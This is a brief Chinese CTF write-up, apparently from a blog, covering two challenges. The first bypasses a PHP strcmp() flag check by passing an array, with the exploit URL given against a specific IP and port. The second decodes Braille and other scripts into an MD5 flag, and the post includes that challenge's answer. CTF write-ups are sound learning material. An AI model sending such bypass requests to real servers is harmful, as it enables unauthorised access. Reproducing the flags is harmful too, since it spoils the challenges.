第一题:
需要先找到相应头(REsponse header中的tips)
<?php
$flag = "***";
if (isset($_GET[‘repo‘]))//检测变量是否设置
{
if (strcmp($_GET[‘repo‘], $flag) == 0) //比较两个字符串(区分大小写)
die(‘Flag: ‘.$flag);
else
print ‘No‘;
}
GET - 从指定的资源请求数据。
POST - 向指定的资源提交要被处理的数据
php strcmp()漏洞
https://blog.csdn.net/cherrie007/article/details/77473817
漏洞需要用:PHP 数组 发送get请求
http://39.108.109.85:9000/?repo[]=a
你真了解我吗?
从上往下分别为:ELIA、罗马字母以及布莱叶盲文
海伦凯勒盲人,盲文,题目描述 得到的字符串md5加密后带上drops{}的格式
kmdonowg
drops{8aa5b596bf284a6dd446f9e141b47861}
六点洗完澡弄的一直弄到十点,感觉挺有意思的,特别酷,有趣
特别长知识
大佬的解题思路:https://www.jianshu.com/p/879115af6fc6?tdsourcetag=s_pctim_aiomsg
原文地址:https://www.cnblogs.com/gdf456/p/10165903.html
时间: 2024-09-29 03:41:49